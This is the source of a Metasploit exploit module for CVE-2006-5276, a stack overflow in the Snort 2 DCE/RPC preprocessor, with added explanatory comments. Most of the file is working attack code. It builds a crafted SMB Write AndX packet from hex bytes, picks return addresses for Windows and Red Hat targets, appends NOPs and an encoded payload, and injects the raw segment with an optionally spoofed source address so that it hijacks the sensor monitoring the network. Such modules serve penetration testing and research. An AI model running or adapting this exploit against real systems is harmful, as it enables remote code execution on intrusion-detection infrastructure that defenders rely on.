GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/ids/snort_dce_rpc.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for the Snort 2 DCE/RPC preprocessor overflow
# (CVE-2006-5276, see 'References' below).
#
# Unlike a connected TCP exploit, this module never opens a socket to RHOST:
# it uses the Capture mixin to inject one raw TCP segment on the wire
# (see #exploit and #buildpacket). The sensor that inspects the segment is
# what gets exploited, not the host the segment is addressed to.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  # Capture supplies open_pcap / capture_sendto (raw packet injection).
  # Remote::Tcp presumably supplies rhost / rport and the RPORT option used
  # below — confirm against the mixin.
  include Msf::Exploit::Capture
  include Msf::Exploit::Remote::Tcp

  # Declares module metadata, targets, payload constraints and options.
  #
  # @param info [Hash] metadata merged via update_info before being passed to super
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Snort 2 DCE/RPC Preprocessor Buffer Overflow',
        'Description' => %q{
          This module allows remote attackers to execute arbitrary code by exploiting the
          Snort service via crafted SMB traffic. The vulnerability is due to a boundary
          error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests,
          which may result a stack-based buffer overflow with a specially crafted packet
          sent on a network that is monitored by Snort.

          Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6.

          Any host on the Snort network may be used as the remote host. The remote host does not
          need to be running the SMB service for the exploit to be successful.
        },
        'Author' => [
          'Neel Mehta', # Original discovery (IBM X-Force)
          'Trirat Puttaraksa', # POC
          'Carsten Maartmann-Moe <carsten[at]carmaa.com>', # Metasploit win
          '0a29406d9794e4f9b30b3c5d6702c708' # Metasploit linux
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '32094' ],
          [ 'CVE', '2006-5276' ],
          [ 'URL', 'http://web.archive.org/web/20070221235015/http://www.snort.org/docs/advisory-2007-02-19.html'],
          [ 'URL', 'http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html'],
          [ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        # Space bounds the encoded payload appended in #buildpacket; NUL is
        # excluded from the encoded bytes. NOPs are added by hand there, hence
        # DisableNops.
        'Payload' => {
          'Space' => 390,
          'BadChars' => "\x00",
          'DisableNops' => true
        },
        # Per-target values consumed by #buildpacket: 'Ret' is packed as the
        # overwritten return address, 'Offset' feeds the Write AndX #2 size
        # field, 'Padding' is the NOP count inserted before the return address.
        'Targets' => [
          [
            'Windows Universal',
            {
              'Platform' => 'win',
              'Ret' => 0x00407c01, # JMP ESP snort.exe
              'Offset' => 289, # The number of bytes before overwrite
              'Padding' => 0
            }
          ],
          [
            'Redhat 8',
            {
              'Platform' => 'linux',
              'Ret' => 0xbffff110,
              'Offset' => 317,
              'Padding' => 28
            }
          ]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2007-02-19',
        'DefaultTarget' => 0,
        # NOTE(review): Reliability / Stability / SideEffects are left as the
        # UNKNOWN_* placeholders rather than documented values.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # RHOST is only the destination address written into the segment; per the
    # description any host on the monitored network will do. SHOST, when set,
    # overrides the source address chosen in #exploit.
    register_options(
      [
        Opt::RPORT(139),
        OptAddress.new('RHOST', [ true, 'A host on the Snort-monitored network' ]),
        OptAddress.new('SHOST', [ false, 'The (potentially spoofed) source address'])
      ]
    )

    # Capture-mixin options that presumably only matter for sniffing; this
    # module only transmits. Verify against Msf::Exploit::Capture.
    deregister_options('FILTER', 'PCAPFILE', 'SNAPLEN', 'TIMEOUT')
  end

  # Builds the crafted segment, injects it through the pcap interface and,
  # if the send succeeded, starts the payload handler.
  #
  # No TCP connection is established at any point: the segment leaves via
  # capture_sendto exactly as #buildpacket assembled it.
  def exploit
    open_pcap

    # Source address: SHOST if supplied, otherwise the local address that
    # routes to rhost. `||` falls through only on nil/false — an empty SHOST
    # string would be used as-is.
    shost = datastore['SHOST'] || Rex::Socket.source_address(rhost)

    p = buildpacket(shost, rhost, rport.to_i)

    print_status("#{rhost}:#{rport} Sending crafted SMB packet from #{shost}...")

    # A falsy return from capture_sendto aborts before the handler is started.
    return unless capture_sendto(p, rhost)

    handler
  end

  # Assembles the raw TCP segment carrying the fixed SMB request sequence
  # followed by the target-specific overflow data.
  #
  # @param shost [String] source IP written into the IP header
  # @param rhost [String] destination IP written into the IP header
  # @param rport [Integer] TCP destination port
  # @return [PacketFu::TCPPacket] segment with length/checksum fields recalculated
  def buildpacket(shost, rhost, rport)
    p = PacketFu::TCPPacket.new
    p.ip_saddr = shost
    p.ip_daddr = rhost
    p.tcp_dport = rport
    # PSH|ACK only — no SYN, so this is presented as a mid-stream segment
    # with no preceding handshake on the wire.
    p.tcp_flags.psh = 1
    p.tcp_flags.ack = 1

    # SMB packet borrowed from https://www.exploit-db.com/exploits/3362

    # NetBIOS Session Service, value is the number of bytes in the TCP segment,
    # must be greater than the total size of the payload. Statically set.
    # (0xdead is fixed and does not track the actual segment length.)
    header = "\x00\x00\xde\xad"

    # SMB Header
    header << "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
    header << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
    header << "\x00\x08\x30\x00"

    # Tree Connect AndX Request
    header << "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
    header << "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
    header << "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
    header << "\x3f\x3f\x3f\x3f\x3f\x00"

    # NT Create AndX Request
    header << "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
    header << "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    header << "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
    header << "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
    header << "\x63\x00\x00\x00"

    # Write AndX Request #1
    header << "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
    header << "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"
    header << "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00"
    header << "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
    header << "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
    header << "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
    header << "\x2b\x10\x48\x60\x02\x00\x00\x00"

    # Write AndX Request #2
    # The request is split here so the 16-bit size computed below can be
    # spliced in between `header` and `tail`.
    header << "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
    header << "\x00\x48\x00\x00\x00\xff\x01"
    tail = "\x00\x00\x00\x00\x49\x00\xee"

    # Return address, 32-bit little-endian ('V'), from the selected target.
    eip = [target['Ret']].pack('V')

    # Sploit: 10 NOPs followed by the encoded payload (bounded by 'Space').
    sploit = make_nops(10)
    sploit << payload.encoded

    # Padding (to pass size check)
    sploit << make_nops(1)

    # The size to be included in Write AndX Request #2, including sploit payload
    # 16-bit little-endian ('v'): sploit length plus the target's 'Offset'.
    requestsize = [(sploit.size + target['Offset'])].pack('v')

    # Assemble the parts into one package
    # Every `<<` appends in place, so p.payload receives `header` itself,
    # now holding: header | requestsize | tail | Padding NOPs | eip | sploit.
    # For the Windows target Padding is 0 — assumes make_nops(0) yields an
    # empty string; confirm against the Exploit mixin.
    p.payload = header << requestsize << tail << make_nops(target['Padding']) << eip << sploit

    # Recompute IP/TCP length and checksum fields now that the payload is set.
    p.recalc

    p
  end
end